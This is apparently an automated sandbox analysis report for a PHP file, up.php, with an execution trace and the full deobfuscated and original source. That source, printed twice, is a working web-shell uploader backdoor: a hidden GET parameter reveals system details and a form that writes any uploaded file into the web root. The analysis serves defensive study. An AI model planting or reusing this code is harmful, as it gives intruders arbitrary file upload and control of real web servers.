PHP Malware Analysis
up.php
md5: e2c6e3d33f78b20c3c25cb77a21e99a2
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Environment
- error_reporting (Deobfuscated, Original, Traces)
- php_uname (Deobfuscated, Original)
- set_time_limit (Deobfuscated, Original, Traces)
Files
- copy (Deobfuscated, Original)
Input
- _FILES (Deobfuscated, Original)
- _GET (Deobfuscated, Original)
- _POST (Deobfuscated, Original)
Deobfuscated PHP code
<?php
set_time_limit(0);
error_reporting(0);
error_log(0);
if (isset($_GET["XPLOIT"])) {
echo "<center>\n<h4>\xe2\x9c\x98\xe2\x9c\x98\xe2\x9c\x98 \xf0\x9d\x9a\x82\xf0\x9d\x99\xbd\xf0\x9d\x99\xb8\xf0\x9d\x99\xbf\xf0\x9d\x99\xb4\xf0\x9d\x9a\x81\xf0\x9d\x9f\xba\xf0\x9d\x9f\xb6\xf0\x9d\x9f\xba \xf0\x9d\x99\xb6\xf0\x9d\x99\xb7\xf0\x9d\x99\xbe\xf0\x9d\x9a\x82\xf0\x9d\x9a\x83 \xf0\x9d\x9a\x87\xf0\x9d\x99\xbf\xf0\x9d\x99\xbb\xf0\x9d\x99\xbe\xf0\x9d\x99\xb8\xf0\x9d\x9a\x83 \xe2\x9c\x98\xe2\x9c\x98\xe2\x9c\x98</h4><br><b>" . php_uname() . "</b><br><br>";
echo "<form method='post' enctype='multipart/form-data'>\n<input type='file' name='FUCK'>\n<input type='submit' name='TOD' value='UPLOAD'>\n</form><br><br>";
$SNIPER404 = $_SERVER['DOCUMENT_ROOT'];
$GHOST = $_FILES['FUCK']['name'];
$ANJIR = $SNIPER404 . '/' . $GHOST;
if (isset($_POST['TOD'])) {
if (is_writable($SNIPER404)) {
if (@copy($_FILES['FUCK']['tmp_name'], $ANJIR)) {
$XPLOIT = "http://" . $_SERVER['HTTP_HOST'] . "/";
echo "Sukses mas :) <a href='{$XPLOIT}/{$GHOST}' target='_blank'>{$XPLOIT}/{$GHOST}</a>";
} else {
echo "Gagal mas :(";
}
} else {
if (@copy($_FILES['FUCK']['tmp_name'], $GHOST)) {
echo "Sukses di folder ini mas";
} else {
echo "";
}
}
}
}Execution traces
data/traces/e2c6e3d33f78b20c3c25cb77a21e99a2_trace-1676254916.4386.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 00:22:22.336401]
1 0 1 0.000192 393464
1 3 0 0.000276 400136 {main} 1 /var/www/html/uploads/up.php 0 0
2 4 0 0.000293 400136 set_time_limit 0 /var/www/html/uploads/up.php 2 1 0
2 4 1 0.000310 400200
2 4 R FALSE
2 5 0 0.000324 400168 error_reporting 0 /var/www/html/uploads/up.php 3 1 0
2 5 1 0.000338 400208
2 5 R 22527
2 6 0 0.000351 400168 error_log 0 /var/www/html/uploads/up.php 4 1 0
2 6 1 0.000378 400200
2 6 R TRUE
1 3 1 0.000393 400168
0.000420 314200
TRACE END [2023-02-13 00:22:22.336666]
Generated HTML code
<html><head></head><body></body></html>Original PHP code
<?php
set_time_limit(0);
error_reporting(0);
error_log(0);
if(isset($_GET["XPLOIT"])){
echo "<center>
<h4>βββ ππ½πΈπΏπ΄ππΊπΆπΊ πΆπ·πΎππ ππΏπ»πΎπΈπ βββ</h4><br><b>".php_uname()."</b><br><br>";
echo "<form method='post' enctype='multipart/form-data'>
<input type='file' name='FUCK'>
<input type='submit' name='TOD' value='UPLOAD'>
</form><br><br>";
$SNIPER404 = $_SERVER['DOCUMENT_ROOT'];
$GHOST = $_FILES['FUCK']['name'];
$ANJIR = $SNIPER404.'/'.$GHOST;
if(isset($_POST['TOD'])) {
if(is_writable($SNIPER404)) {
if(@copy($_FILES['FUCK']['tmp_name'], $ANJIR)) {
$XPLOIT = "http://".$_SERVER['HTTP_HOST']."/";
echo "Sukses mas :) <a href='$XPLOIT/$GHOST' target='_blank'>$XPLOIT/$GHOST</a>";
} else {
echo "Gagal mas :(";
}
} else {
if(@copy($_FILES['FUCK']['tmp_name'], $GHOST)) {
echo "Sukses di folder ini mas";
} else {
echo "";
}
}
}
}
?>